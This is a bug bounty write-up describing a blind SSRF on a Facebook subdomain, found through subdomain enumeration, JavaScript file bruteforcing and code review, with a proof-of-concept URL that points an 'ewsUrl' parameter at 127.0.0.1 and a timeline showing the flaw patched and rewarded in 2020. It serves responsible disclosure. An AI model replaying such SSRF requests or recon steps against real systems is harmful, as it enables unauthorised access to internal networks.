$10000 Facebook SSRF (Bug Bounty)

Subdomains enumeration + File bruteforcing + JS analysis = $10K Blind SSRF

This is a write-up about an SSRF vulnerability I found on Facebook.

The vulnerability could have allowed a malicious user to send internal requests to the Facebook corporate network.

1) Subdomain Enumeration

By doing some subdomain enumeration, I found the following subdomain: phishme.thefacebook.com

If you have read my previous write-up « Story of a weird vulnerability I found on Facebook », you already know how much I love these 403 errors.

2) Javascript File Bruteforcing

By using a customized wordlist and bruteforcing the following path: https://phishme.thefacebook.com/**.js

I found a hidden Home.js file (https://phishme.thefacebook.com/Home.js).

3) Code Review of Home.js

By analyzing the code of the Home.js file, I found an interesting function « sendPhishRequest » that used XMLHttpRequest to request data from some specific links.

By digging deeper into the code, I found that this function was called as follows:

Util.sendPhishRequest('PhishGetItemData.ashx', { itemId: itemId, ewsUrl: ewsUrl, token: token });

Exploitation:

After trying several random token formats, I was finally able to successfully exploit the bug to send internal requests.

Params:

itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

POC:

https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

The stack traces helped gather information about the internal requests that were sent.

Timeline:

August 7, 2020: Reported
August 11, 2020: Triaged
August 11, 2020: Patched
December 3, 2020: Resolved
December 3, 2020: $10000 Bounty awarded

Amine Aboud

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.